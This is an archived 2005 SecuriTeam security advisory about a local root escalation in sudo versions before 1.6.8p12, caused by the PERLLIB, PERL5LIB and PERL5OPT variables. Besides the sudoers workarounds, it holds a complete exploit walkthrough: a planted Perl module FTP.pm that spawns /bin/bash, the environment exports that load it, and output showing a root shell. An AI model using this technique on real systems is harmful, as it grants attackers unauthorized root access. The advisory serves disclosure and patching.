Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Sudo Perl Local Privileges Escalation

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Sudo Perl Local Privileges Escalation
Date: 28 Dec 2005 12:25:16 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Sudo Perl Local Privileges Escalation
------------------------------------------------------------------------


SUMMARY

" <http://www.sudo.ws/sudo/sudo.html> Sudo (superuser do) allows a system 
administrator to give certain users (or groups of users) the ability to 
run some (or all) commands as root or another user while logging the 
commands and arguments."

Sudo execute sub processes of Perl module with the privileges of the main 
perl script, allowing local attackers to execute arbitrary code.

DETAILS

Vulnerable Systems:
 * sudo version 1.6.8p11 and prior

Immune Systems:
 * sudo version 1.6.8p12

The PERL5LIB and PERLLIB environment variables can be used to provide a 
list of directories in which to look for Perl library files before the 
system directories are searched. It is similar in concept to the 
LD_LIBRARY_PATH environment variables, only for Perl. These variables are 
ignored if "tainting" is enabled (via the -T switch). The PERL5OPT 
environment variable specifies additional command line options to be 
passed to the script which may modify its behavior.
Malicious users with sudo access to run a Perl script can use these 
variables to include and execute their own library file with the same name 
as a system library file that is included (via the "use" or "require" 
directives) by the Perl script run via sudo.

Exploitation of the bug requires that Perl be installed on the machine and 
that users be granted sudo access to run Perl scripts that do not have 
tainting turned on.

Workaround:
The administrator can add a line at the top of the sudoers file:

Defaults env_delete+="PERLLIB PERL5LIB PERL5OPT"

which will cause sudo to strip the PERLLIB, PERL5LIB and PERL5OPT 
environment variables without requiring a recompile. Alternately, the 
administrator can add a line to the top of sudoers file:

Defaults env_reset

Which will reset the environment to only contain the variables HOME, 
LOGNAME, PATH, SHELL, TERM, and USER, also preventing this attack.

Exploit:
## Sudo local root exploit ##
## vuln versions : sudo < 1.6.8p12
## adv : http://www.securityfocus.com/bid/15394
## adv : http://www.frsirt.com/bulletins/2642

##by breno - breno at kalangolinux.org

## You need execute access to perl script in sudo ##

## cat /etc/sudoers ##

breno   ALL=(ALL) /home/breno/code.pl

## Now let's create your own perl module FTP.pm :) good name.

breno  ~ $ -> mkdir modules
breno  ~ $ -> mkdir FTP
breno  ~/modules $ -> ls
FTP
breno  ~/modules $ -> cd FTP
breno  ~/modules/FTP $ -> h2xs -AXc -n FTP
Defaulting to backwards compatibility with perl 5.8.7
If you intend this module to be compatible with earlier perl versions, 
please
specify a minimum perl version with the -b option.

Writing FTP/lib/FTP.pm
Writing FTP/Makefile.PL
Writing FTP/README
Writing FTP/t/FTP.t
Writing FTP/Changes
Writing FTP/MANIFEST
breno  ~/modules/FTP $ ->

breno  ~/modules/FTP/FTP $ -> perl Makefile.PL
Checking if your kit is complete...
Looks good
Writing Makefile for FTP
breno  ~/modules/FTP/FTP $ -> make
cp lib/FTP.pm blib/lib/FTP.pm
Manifying blib/man3/FTP.3pm
breno  ~/modules/FTP/FTP $ -> make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" 
"test_harness(0,
'blib/lib', 'blib/arch')" t/*.t
t/FTP....ok
All tests successful.
Files=1, Tests=1,  0 wallclock secs ( 0.03 cusr +  0.01 csys =  0.04 CPU)
breno  ~/modules/FTP/FTP $ ->

#Now i deleted the default FTP.pm (it was ugly), and create my beautiful 
module

breno  ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm

FTP.pm:
package FTP;

use strict;
use vars qw($VERSION);
$VERSION = '0.01';

sub new {
  my $package = shift;
  return bless({}, $package);
}

sub verbose {
    my $self = shift;
    system("/bin/bash");
    if (@_) {
    $self->{'verbose'} = shift;
      }
       return $self->{'verbose'};
}

sub hoot {
   my $self = shift;
   return "Don't pollute!" if $self->{'verbose'};
   return;
}

1;
__END__

#EOF

# Remenber our super code.pl

breno  ~ $ -> vi code.pl

code.pl:
#!/usr/bin/perl

BEGIN { $| = 1; print "1..1\n"; }
END {print "not ok 1\n" unless $loaded;}
use FTP;
$loaded = 1;
print "ok 1\n";

my $obj = new FTP;
$obj->verbose(1);
my $result = $obj->hoot;
print ($result eq "Don't pollute!" ? "ok 2\n" : "not ok 2\n");

$obj->verbose(0);
my $result = $obj->hoot;
print ($result eq "" ? "ok 3\n" : "not ok 3\n");

#EOF

# Now let's play with PERLLIB and PERL5OPT env.

breno  ~ $ -> export PERLLIB="/home/breno/modules/FTP/FTP/blib/lib/"
breno  ~ $ -> export PERL5OPT="-MFTP"

# Now get Root!! :)

breno  ~ $ -> sudo ./code.pl
Password:
1..1
ok 1
root  ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root  ~ # ->


ADDITIONAL INFORMATION

The information has been provided by Charles Morris.
The original article can be found at:  
<http://www.sudo.ws/sudo/alerts/perl_env.html> 
http://www.sudo.ws/sudo/alerts/perl_env.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Sudo Perl Local Privileges Escalation, SecuriTeam <=
Previous by Date:  [NEWS] Symantec Antivirus RAR Library Multiple Heap Overflows, SecuriTeam
Next by Date:  [NT] Microsoft Internet Explorer Multiple DoS (datasrc, mshtml.dll), SecuriTeam
Previous by Thread:  [NEWS] Symantec Antivirus RAR Library Multiple Heap Overflows, SecuriTeam
Next by Thread:  [NT] Microsoft Internet Explorer Multiple DoS (datasrc, mshtml.dll), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]